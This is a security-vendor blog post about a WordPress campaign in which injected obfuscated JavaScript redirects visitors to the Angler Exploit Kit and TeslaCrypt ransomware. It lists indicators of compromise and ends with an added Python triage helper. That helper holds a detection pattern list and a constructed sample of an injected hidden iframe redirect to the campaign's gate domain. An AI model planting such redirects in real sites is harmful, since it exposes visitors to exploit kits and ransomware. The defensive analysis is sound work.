In the past week, a massive campaign targeting WordPress-based websites has been reported by several security vendors, including Sucuri and Malwarebytes. In the previous iteration, unsuspecting victims were redirected to domains hosting ads which, if clicked, sent them to the Nuclear Exploit Kit landing page. Check Point security analysts have recently observed a change in the process – victims are now sent to the notorious Angler Exploit Kit landing page.
An obfuscated malicious script is appended to the end of the infected websites’ JS files. When the user’s browser loads the page, the script redirects to a gate controlled by the malicious actor.
This is the obfuscated script; everything after the comment is injected into the original script:
After two layers of obfuscation, we can see an iframe that redirects the victim to the actor’s gate:
The gate then responds with another script which examines the user’s browser. It then writes and submits a form object to the page, generating a POST request.
The POST response contains the following script, which redirects users to the Angler Exploit Kit landing page:
The payload can vary at the threat actor’s discretion. In this particular instance, the payload used is the TeslaCrypt ransomware. At present, not many security vendors are familiar with this component of the ransomware, as its VirusTotal detection is relatively low.
Check Point Software Blades provide protection against all stages of the infection chain:
- Anti-Virus and Anti-Bot Blades provide protection against all known variants of the TeslaCrypt (Trojan-Ransom.Win32.TeslaCrypt; Operator.Teslacrypt)
- IPS Blade provides protection against all known variants of the Angler Exploit Kit (Angler Exploit Kit Redirection; Angler Exploit Kit Landing Page; Angler Exploit Kit Landing Page URL; Angler Exploit Kit Landing Page Patterns)
Indicators of compromise:
- a8f71638d511d60c7bf8c3de1f7951d7 – Payload MD5
- krasnayadama[.]info – Gate Domain
- emilyg[.]info – Angler Exploit Kit domain
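The following triage helper is an added example and not part of the original post or of Check Point's own tooling. It applies the two facts the post gives a defender: the malicious script is appended to the end of existing JS files on the site, and the indicators above (gate domain, Angler domain, payload MD5). Given a pristine copy of a JS file (for instance from the WordPress or plugin release archive), it isolates the appended tail, scores it for common obfuscation constructs, and checks any hostnames it references against the listed domains. The obfuscation markers and the sample file contents are constructed for this example; the real injected script hides its domains behind two layers of obfuscation, so the domain check is most useful on decoded stages or on proxy logs rather than on the raw tail.

```python
"""Triage helpers for JS files on a WordPress site suspected of the
appended-script injection described above (added example, not the post's code)."""
import hashlib
import re
from typing import Optional

# Indicators from the post. They are defanged with [.] there; undefanged here so they match hostnames.
IOC_DOMAINS = {"krasnayadama.info", "emilyg.info"}
IOC_PAYLOAD_MD5 = {"a8f71638d511d60c7bf8c3de1f7951d7"}

# Constructs commonly seen in obfuscated injected scripts. This list is an assumption of
# the example, not a signature taken from the campaign.
OBFUSCATION_MARKERS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"String\.fromCharCode\s*\("),
    re.compile(r"\bunescape\s*\("),
    re.compile(r"document\.write\s*\("),
    re.compile(r"<iframe\b", re.IGNORECASE),
]

HOSTNAME_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)


def appended_tail(pristine: str, current: str) -> Optional[str]:
    """Return what was appended to a JS file relative to its pristine copy.

    "" means the file is unchanged; None means it was modified somewhere other
    than its tail, which needs manual review rather than this fast path."""
    if current == pristine:
        return ""
    if current.startswith(pristine):
        return current[len(pristine):]
    return None


def ioc_domains_in(text: str) -> set:
    """Hostnames in text that equal, or are subdomains of, a listed IoC domain."""
    hits = set()
    for match in HOSTNAME_RE.finditer(text):
        host = match.group(1).lower()
        for domain in IOC_DOMAINS:
            if host == domain or host.endswith("." + domain):
                hits.add(domain)
    return hits


def obfuscation_score(text: str) -> int:
    """Number of distinct obfuscation markers present in text."""
    return sum(1 for pattern in OBFUSCATION_MARKERS if pattern.search(text))


def payload_md5_matches(data: bytes) -> bool:
    """True if a dropped file hashes to the payload MD5 listed in the post."""
    return hashlib.md5(data).hexdigest() in IOC_PAYLOAD_MD5


def triage_js(pristine: str, current: str) -> dict:
    """Compare a served JS file with its pristine copy and summarise the findings."""
    tail = appended_tail(pristine, current)
    # Analyse only the appended part when it can be isolated; otherwise the whole file.
    subject = tail if tail else current
    domains = ioc_domains_in(subject)
    score = obfuscation_score(subject)
    modified = current != pristine
    return {
        "modified": modified,
        "appended_tail": tail,
        "ioc_domains": domains,
        "obfuscation_score": score,
        "suspicious": bool(domains) or (modified and score >= 2),
    }


# Constructed sample input: a clean file and a copy with an appended comment plus a
# clear-text redirect to the gate domain. This is NOT the campaign's real script.
PRISTINE_JS = "(function(){var a=1;})();\n"
INFECTED_JS = PRISTINE_JS + (
    "/*x*/eval(String.fromCharCode(100,111,99));"
    "document.write(\"<iframe src='http://krasnayadama.info/gate' width=1 height=1></iframe>\");"
)

if __name__ == "__main__":
    print(triage_js(PRISTINE_JS, PRISTINE_JS))
    print(triage_js(PRISTINE_JS, INFECTED_JS))
```

In practice the pristine copies come from the exact release versions the site runs, and a file that is modified somewhere other than its tail (`appended_tail` returns None) should be diffed by hand rather than trusted or discarded.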